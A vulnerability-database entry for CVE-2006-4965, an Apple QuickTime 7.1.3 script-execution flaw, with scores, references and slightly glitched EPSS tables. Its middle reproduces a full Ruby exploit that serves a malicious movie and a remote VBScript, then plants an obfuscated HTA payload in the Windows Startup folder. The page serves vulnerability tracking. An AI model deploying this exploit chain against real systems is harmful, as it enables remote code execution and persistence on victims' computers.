CVE-2006-4965

CVE Descriptions

Apple QuickTime 7.1.3 Player and Plug-In allows remote attackers to execute arbitrary JavaScript code and possibly conduct other attacks via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter that identifies resources outside of the original domain. NOTE: as of 20070912, this issue has been demonstrated by using instances of Components.interfaces.nsILocalFile and Components.interfaces.nsIProcess to execute arbitrary local files within Firefox and possibly Internet Explorer.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-94	Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:P/A:N	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	12.57%	–	–
2022-04-03	–	–	12.57%	–	–
2023-02-26	–	–	12.57%	–	–
2023-03-12	–	–	–	2.18%	–
2023-06-25	–	–	–	2.99%	–
2023-07-09	–	–	–	2.99%	–
2023-07-30	–	–	–	1.98%	–
2023-10-29	–	–	–	1.98%	–
2023-11-12	–	–	–	1.98%	–
2023-11-19	–	–	–	1.98%	–
2023-11-26	–	–	–	1.98%	–
2023-12-17	–	–	–	1.98%	–
2024-03-24	–	–	–	1.98%	–
2024-06-02	–	–	–	1.98%	–
2024-08-25	–	–	–	2.78%	–
2024-12-22	–	–	–	47.03%	–
2025-01-19	–	–	–	49.69%	–
2025-01-19	–	–	–	49.69%	–
2025-03-18	–	–	–	–	7.43%
2025-03-18	–	–	–	–	7.43,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	9%
2022-04-03	95%
2023-02-26	96%
2023-03-12	88%
2023-06-25	89%
2023-07-09	9%
2023-07-30	87%
2023-10-29	88%
2023-11-12	87%
2023-11-19	88%
2023-11-26	87%
2023-12-17	88%
2024-03-24	89%
2024-06-02	89%
2024-08-25	91%
2024-12-22	98%
2025-01-19	98%
2025-01-19	98%
2025-03-18	91%
2025-03-18	91%

Exploit information

Exploit Database EDB-ID : 28639

Publication date : 2006-09-20 22h00 +00:00
Author : LMH
EDB Verified : Yes

source: https://www.securityfocus.com/bid/20138/info Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files (.qtl). An attacker can exploit this issue to execute arbitrary script code in the context of the affected application and load local content in a user's browser. Although this weakness doesn't pose any direct security threat by itself, an attacker may use it to aid in further attacks. QuickTime 7.1.3 is vulnerable; other versions may also be affected. #!/usr/bin/ruby # # (c) 2006 LMH <lmh [at] info-pull.com> # Original scripting and POC by Aviv Raff (http://aviv.raffon.net). # # Description: # Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the # fake FTP server (required). HTTP server port can be modified but it's # not recommended. Adjust as necessary. # # see http://projects.info-pull.com/moab/MOAB-03-01-2007.html require 'socket' require 'fileutils' require 'webrick' trap 0, proc { puts "-- Terminating: #{$$}" } REMOTE_HOST = "192.168.1.133" # Modify to match IP address or hostname REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath) TARGET_SCRIPT = "on error resume next\r\n" + "Set c = CreateObject(\"ADODB.Connection\")\r\n" + "co = \"Driver={Microsoft Text Driver (*.txt; *.csv)};Dbq=#{REMOTE_URL};Extensions=txt;\"\r\n" + "c.Open co\r\n" + "set rs =CreateObject(\"ADODB.Recordset\")\r\n" + "rs.Open \"SELECT * from qtpoc.txt\", c\r\n" + "rs.Save \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\poc.hta\", adPersistXML\r\n" + "rs.close\r\n" + "c.close\r\n" + "window.close\r\n" HTA_PAYLOAD = "<script>q='%77%73%63%72%69%70';</script>\r\n" + "<script>q+='%74%2E%73%68%65%6C%6C';</script>\r\n" + "<script>a=new ActiveXObject(unescape(q));</script>\r\n" + "<script>a.run('%windir%\\\\System32\\\\calc.exe');</script>\r\n" + # executes calc.exe "<script>window.close();</script>\r\n" HREFTRACK_COD = "A<res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript src=\"#{REMOTE_URL}q.vbs\" " + "language=\"vbscript\"%3E%3C/script%3E%3C%21--//|> T<>" TARGET_DIRECTORY = "served" # # ---- Real fun starts here ---- # puts "++ Preparing files..." # # Prepare the MOV file with the HREFTrack pointing at our script. # original_mov = File.read("qtpoc.mov") # Prepare directory structure FileUtils::mkdir(TARGET_DIRECTORY) puts "++ MOV file...." # Write the new MOV file f = File.new(File.join(TARGET_DIRECTORY, "qtpoc.mov"), "w") f.write(original_mov) f.close puts "++ Script file...." # Write the script file f = File.new(File.join(TARGET_DIRECTORY, "q.vbs"), "w") f.print(TARGET_SCRIPT) f.close puts "++ HTA payload file...." # Write the new HTA file (payload) f = File.new(File.join(TARGET_DIRECTORY, "qtpoc.txt"), "w") f.print(HTA_PAYLOAD) f.close # # win32 doesn't like fork ;-) # if ARGV[0] == "serve" # HTTP server... via Webrick puts "++ Done. Starting HTTP server..." web_server = WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot =>TARGET_DIRECTORY) fork do begin web_server.start rescue exit end end # FTP server.... puts "++ Done. Starting FTP server..." begin ftp_server = TCPServer.new('localhost', 21) rescue web_server.shutdown exit end # 220 Microsoft FTP Service # USER anonymous # 331 Anonymous access allowed, send identity (e-mail name) as password. # PASS IEUser@ # 230 Anonymous user logged in. # (...) while (ftp_session = ftp_server.accept) puts "++ FTP: #{ftp_session.gets}" # TODO: implement fake responses just to satisfy it. ftp_session.close end # finished web_server.shutdown end

Products Mentioned

Configuraton 0

Apple>>Quicktime >> Version 7.1.3

Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)

References

http://securityreason.com/securityalert/1631
Tags : third-party-advisory, x_refsource_SREASON

http://www.kb.cert.org/vuls/id/751808
Tags : third-party-advisory, x_refsource_CERT-VN

http://secunia.com/advisories/27414
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.securityfocus.com/archive/1/479179/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://www.securitytracker.com/id?1018687
Tags : vdb-entry, x_refsource_SECTRACK

http://www.gnucitizen.org/blog/backdooring-mp3-files/
Tags : x_refsource_MISC

http://www.securityfocus.com/archive/1/453756/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://lists.apple.com/archives/Security-announce/2007/Mar/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE

http://www.vupen.com/english/advisories/2007/3155
Tags : vdb-entry, x_refsource_VUPEN

http://www.securityfocus.com/bid/20138
Tags : vdb-entry, x_refsource_BID

http://www.securityfocus.com/archive/1/446750/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://docs.info.apple.com/article.html?artnum=305149
Tags : x_refsource_CONFIRM

http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox
Tags : x_refsource_MISC

http://secunia.com/advisories/22048
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.gnucitizen.org/blog/myspace-quicktime-worm-follow-up
Tags : x_refsource_MISC

CVE-2006-4965 : Detail